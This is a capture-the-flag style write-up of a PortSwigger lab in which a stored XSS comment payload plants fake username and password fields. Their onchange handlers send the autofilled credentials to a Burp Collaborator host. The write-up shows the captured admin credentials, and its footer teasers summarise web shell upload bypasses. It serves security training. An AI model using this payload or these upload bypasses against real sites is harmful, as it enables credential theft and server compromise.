On this page
Capturing Passwords via XSS
Lab
Exploiting cross-site scripting to capture passwords · Practitioner
Reconnaissance
Go straight to the comment field and check for XSS — COMMENT<>'"\. XSS confirmed.
Next, a simple payload — <img src=x onerror=fetch(1)> — works.
Exploitation
Approach
PortSwigger suggests creating fake inputs that the browser will fill in via autofill — if the user has saved their password. For the mechanism to fire, the inputs need these attributes:
<input name=username id=username>
<input type=password name=password>
Exfiltration
Now we need to send the captured data out. We'll use Burp Collaborator. The trigger for sending username and password is the onchange event.
Final payload:
<input name=username id=username onchange=fetch("https://6pwq1k8rxl5e6swnw369cafh58bzzpne.oastify.com?user="+this.value)>
<input type=password name=password onchange=fetch("https://6pwq1k8rxl5e6swnw369cafh58bzzpne.oastify.com?pwd="+this.value)>
Heads-up: only one payload should be present in the comments (test the final one on a fresh post with no comments, otherwise form autofill breaks).
Result
Burp Collaborator received 3 requests:
GET /?user=administratoradministrator HTTP/1.1
GET /?pwd=mba29ry6e4jzms6kv354 HTTP/1.1
GET /?user=administrator HTTP/1.1
The first one is odd.
Try administrator / mba29ry6e4jzms6kv354 — it works.
More in this category
Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)
.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.
Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)
Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.
Remote Code Execution via Web Shell Upload (PortSwigger Lab)
Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.